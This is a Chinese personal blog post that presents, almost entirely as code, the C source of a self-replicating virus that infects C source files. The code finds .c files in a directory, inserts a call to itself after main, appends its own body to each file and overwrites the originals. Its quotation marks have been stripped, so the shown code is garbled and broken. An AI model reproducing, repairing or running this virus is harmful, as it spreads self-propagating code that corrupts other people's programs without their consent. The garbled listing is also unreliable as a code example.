最新的网络安全咨询!

〓.::展翅高飞::.〓

感染c源程序的病毒

3月 29th, 2008 by XSign

#include <stdio.h>
#include <string.h>
#include <dir.h>
#include <io.h>

#define Max_line 600
#define N_vir 3032
void vir(void);
int main(void)
{
vir();
return 0;
}
void vir(void)
{
struct ffblk ffblk;
FILE *s_fp,*t_fp,*c_fp;
char *find[]={int,char,long,double,float,struct,enum,union,bool,FILE};
char *attack=Code_c_virus;
char *labl=#include <stdio.h>\n;
char *label=#include <string.h>\n;
long int len=0;
long int pos_m,pos_i;
int done;
int i;
char line[Max_line];
char line1[Max_line];
char *check=main(;
char ch;
int flag=1;
int flag1=1;
int flag2=0;
int flag3=0;
done = findfirst(*.c,&ffblk,0);
while(!done)
{
if((s_fp=fopen(ffblk.ff_name,r))==NULL)
{
printf(Can’t open the file %s.\n,ffblk.ff_name);
exit(0);
}
printf(Open the file %s.\n\n,ffblk.ff_name);
fseek(s_fp,-25*1L,2);
fgets(line,25,s_fp);
if(strstr(line,attack)!=NULL)
{
printf(It has been infected.\n);
fclose(s_fp);
goto next;
}
rewind(s_fp);
if((t_fp=fopen(c:\\sgl.c,w+))==NULL)
{
/*printf(”Can’t open the file %s.\n”,”sgl.c”); */
exit(0);
}
while(fgets(line,512,s_fp)!=NULL)
{
len++;
if(strstr(line,label)!=NULL)
flag2=1;
if(strstr(line,labl)!=NULL)
flag3=1;
if(strstr(line,check)!=NULL)
{
pos_m=len;
while(fgets(line1,512,s_fp)!=NULL)
{
len++;
for(i=0;i<10;i++)
{
if(strstr(line1,find[i])!=NULL)
{
flag=1;
break;
}
}
if(flag==1)
{
flag=0;
continue;
}
else
{
pos_i=len;
flag1=1;
break;
}
}
if(flag1==1)
break;
else
flag1=0;
}
}
if(flag2!=1&&flag3!=1)
{
fputs(#include <stdio.h>\n,t_fp);
fputs(#include <string.h>\n,t_fp);
}
if(flag2!=1&&flag3==1)
fputs(#include <string.h>\n,t_fp);
if(flag2==1&&flag3!=1)
fputs(#include <stdio.h>\n,t_fp);
fputs(#include <io.h>\n,t_fp);
fputs(#include <dir.h>\n,t_fp);
fputs(#define Max_line 600\n,t_fp);
fputs(#define N_vir 3032\n,t_fp);
rewind(s_fp);
for(i=0;i<len-1;i++)
{
fgets(line,512,s_fp);
fputs(line,t_fp);
}
fputs(void vir(void);\n,t_fp);
fputs(vir();\n,t_fp);
while((ch=fgetc(s_fp))!=EOF)
fputc(ch,t_fp);
fputs(\n,t_fp);
if((c_fp=fopen(__FILE__,r))==NULL)
{
printf(Can’t open the my_file.\n);
goto next;
}
fseek(c_fp,-N_vir*1L,SEEK_END);
while((ch=fgetc(c_fp))!=EOF)
fputc(ch,t_fp);
fclose(s_fp);
fclose(c_fp);
if((s_fp=fopen(ffblk.ff_name,w+))==NULL)
{
/*printf(”Can’t open the file %s.\n”,ffblk.ff_name); */
goto next;
}
rewind(t_fp);
while((ch=fgetc(t_fp))!=EOF)
fputc(ch,s_fp);
fclose(s_fp);
fclose(t_fp);
printf(Infect %s success.\n,ffblk.ff_name);
unlink(c:\\sgl.c);
printf(unlink success.\n);
next:
len=0;flag=1;flag1=1;flag2=0;flag3=0;
done=findnext(&ffblk);
}
#define Code_c_virus
}

Filed under C/C++, .::编程心得::. having

One Response

  1. 波斯波斯 Says:
    1月 5th, 2009 at 3:31 下午

    啊.. 我大部分都看不明白.. 呢.
    感謝您的友鏈.. 受寵若驚呢..
    今天查了下訪問來源才知道啊..

Leave a Comment

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.

最新文章

分类:

存档:

搜索:

其它:

© 2006 〓.::展翅高飞::.〓 E-mail:evilsign@gmail.com